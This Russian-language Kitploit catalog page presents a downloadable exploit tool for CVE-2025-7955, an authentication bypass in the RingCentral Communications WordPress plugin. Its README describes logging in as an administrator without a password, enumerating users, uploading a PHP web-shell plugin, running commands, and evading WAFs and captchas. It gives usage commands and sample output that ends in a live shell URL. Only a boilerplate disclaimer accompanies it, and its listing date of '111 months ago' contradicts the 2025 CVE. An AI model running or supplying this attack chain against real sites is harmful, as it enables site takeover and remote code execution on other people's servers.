Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-7955 — RingCentral Communications 1.5 - 1.6.8 - Отсутствие проверки на стороне сервера приводит к обходу аутентификации через функцию ringcentral_admin_login_2fa_verify | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-7955
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеАутентификацияRed Teaming
GitHubnxploited/cve-2025-7955

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - Отсутствие проверки на стороне сервера приводит к обходу аутентификации через функцию ringcentral_admin_login_2fa_verify

111 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - Отсутствие проверки на стороне сервера, приводящее к обходу аутентификации через функцию ringcentral_admin_login_2fa_verify

🚨 CVE-2025-7955 | Эксплойт для RingCentral Communications WordPress


📝 Обзор уязвимости

CVE: CVE-2025-7955
Затронутый плагин: RingCentral Communications (WordPress)
Затронутые версии: 1.5 – 1.6.8
Оценка CVSS: 9.8 (Критический)
Тип: Обход аутентификации (отсутствие проверки на стороне сервера)

Плагин RingCentral Communications для WordPress уязвим к обходу аутентификации из-за некорректной проверки в функции ringcentral_admin_login_2fa_verify(). Версии 1.5 – 1.6.8 позволяют неаутентифицированным злоумышленникам войти в систему как любой пользователь, просто указав одинаковые поддельные коды.


⚡ Функциональность скрипта

Этот эксплойт автоматизирует всю цепочку атак для CVE-2025-7955. Он предназначен для:

  • Обхода аутентификации: скрипт входит в WordPress как любой пользователь (обычно администратор) без необходимости ввода пароля, используя уязвимую конечную точку 2FA.
  • Автоматического обнаружения имён пользователей: если имя пользователя не указано, скрипт попытается перечислить его через REST API WordPress (/wp-json/wp/v2/users/ID).
  • Извлечения необходимых токенов: автоматически получает nonce для защиты от CSRF, необходимый для загрузки плагинов.
  • Загрузки вредоносного плагина (веб-шелла): после аутентификации скрипт загружает ZIP-архив плагина, содержащего PHP-веб-шелл.
  • Выполнения команд через веб-шелл: после успешной загрузки скрипт демонстрирует выполнение кода, запуская whoami через шелл, и выводит результат.
  • Функций скрытности и обхода защиты: использует случайные задержки, смену User-Agent и базовое обнаружение WAF/капчи для обхода простых средств защиты.

🚀 Использование

  1. Подготовьте ваш вредоносный плагин
    Убедитесь, что ваш ZIP-файл вредоносного плагина (по умолчанию: Nxploit.zip) находится в той же директории, что и скрипт.

  2. Запустите эксплойт:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
    
    • -u, --url : (обязательно) URL целевого сайта WordPress
    • -user, --username : (необязательно) Имя пользователя для входа (будет обнаружено автоматически, если опущено)
    • -id, --id_admin : (по умолчанию: 1) ID пользователя (администратор обычно имеет ID 1)
    • -z, --zip : (по умолчанию: Nxploit.zip) Путь к ZIP-файлу вредоносного плагина
  3. Пример:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress
    

✅ Ожидаемый успешный вывод

root@kitploit:~
888b    888                   888          d8b 888                 888 
8888b   888                   888          Y8P 888                 888 
88888b  888                   888              888                 888 
888Y88b 888 888  888 88888b.  888  .d88b.  888 888888 .d88b.   .d88888 
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888   d8P  Y8b d88" 888 
888  Y88888   X88K   888  888 888 888  888 888 888   88888888 888  888 
888   Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b.     Y88b 888 
888    Y888 888  888 88888P"  888  "Y88P"  888  "Y888 "Y8888   "Y88888 
                     888                                               
                     888                                               
                     888                                               
CVE-2025-7955 Exploit By : Nxploited 

[*] Используется User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Попытка входа как: admin (ID: 1)
[+] Вход выполнен успешно!
[+] Nonce: 661e57f2e4
[*] Загрузка вредоносного плагина...
[+] Плагин успешно загружен!
[*] Выполнение: whoami
----------------------------------------
daemon
----------------------------------------
[+] Шелл: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND

🎯 Ключевые особенности

  • Пароль не требуется: эксплуатирует логическую ошибку для полного обхода аутентификации.
  • Автоматическое перечисление: может извлекать имена пользователей и ID через публичное API.
  • Автоматизированная эксплуатация: от входа до загрузки веб-шелла и выполнения команд — все шаги автоматизированы.
  • Базовые методы обхода: случайные задержки, подмена заголовков и обнаружение базовой защиты.
  • Модульность: легко изменить полезную нагрузку плагина или добавить новые функции.

⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим скриптом.


Автор: Khaled Alenazi (Nxploited)

Скачать инструмент

или с указанием имени пользователя/ID:

root@kitploit:~
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1